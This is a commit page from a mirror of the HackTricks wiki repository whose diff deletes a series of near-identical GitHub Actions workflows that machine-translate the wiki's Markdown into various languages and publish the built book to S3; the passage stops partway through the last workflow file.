maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/windows-hardening/lateral-movement/psexec-and-winexec.m

Browse Source
This commit is contained in:
Translator 2025-08-20 23:38:07 +00:00
parent 1da627edbb
commit c73b1cb438
18 changed files with 218 additions and 1961 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

119
.github/workflows/translate_af.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to AF (Afrikaans)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: af
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: Afrikaans
BRANCH: af
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

119
.github/workflows/translate_de.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to DE (German)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: de
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: German
BRANCH: de
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

119
.github/workflows/translate_el.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to EL (Greek)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: el
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: Greek
BRANCH: el
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

119
.github/workflows/translate_es.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to ES (Spanish)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: es
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: Spanish
BRANCH: es
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

119
.github/workflows/translate_fr.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to FR (French)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: fr
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: French
BRANCH: fr
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

119
.github/workflows/translate_it.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to IT (Italian)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: it
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: Italian
BRANCH: it
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

119
.github/workflows/translate_ja.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to JA (Japanese)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: ja
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: Japanese
BRANCH: ja
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

119
.github/workflows/translate_ko.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to KO (Korean)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: ko
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: Korean
BRANCH: ko
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

119
.github/workflows/translate_pl.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to PL (Polish)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: pl
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: Polish
BRANCH: pl
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

119
.github/workflows/translate_pt.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to PT (Portuguese)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: pt
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: Portuguese
BRANCH: pt
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

119
.github/workflows/translate_sr.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to SR (Serbian)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: sr
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: Serbian
BRANCH: sr
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

119
.github/workflows/translate_sw.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to SW (Swahili)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: sw
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: Swahili
BRANCH: sw
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
